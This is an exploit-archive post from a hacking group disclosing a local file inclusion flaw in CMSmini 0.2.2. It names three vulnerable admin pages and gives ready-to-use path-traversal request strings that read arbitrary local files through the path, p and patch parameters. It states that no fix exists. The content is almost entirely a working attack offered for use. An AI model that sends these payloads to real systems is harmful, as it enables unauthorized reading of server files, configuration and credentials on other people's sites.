CMSmini 0.2.2 Local File Inclusion

2011-10-20 17:02:18
Posted by: Expl0its

# Exploit Title: [CMSmini 0.2.2 Local File Inclusion]
# Date: [2011.11.3]
# Author: Amir Expl0its
# We Are : Black.spook , Expl0its , Higher_sense & H4ckcity.net - zone-hc.com
# Software Link: [http://sourceforge.net/projects/cmsmini/]
# Version: [CMSmini 0.2.2]


Vulnerable Page:

/admin/configure.php
/admin/save.php
/admin/edit.php



Exploit:

/admin/configure.php?path=../../../../../../../../../../../../[ Local File]
/admin/save.php?p=../../../../../../../../../../../../[ Local File ]
/admin/save.php?patch=../../../../../../../../../../../../[ Local File ]
/admin/edit.php?patch=../../../../../../../../../../../../[ Local File ]

Fixes

No fixes

In order to submit a new fix you need to be registered.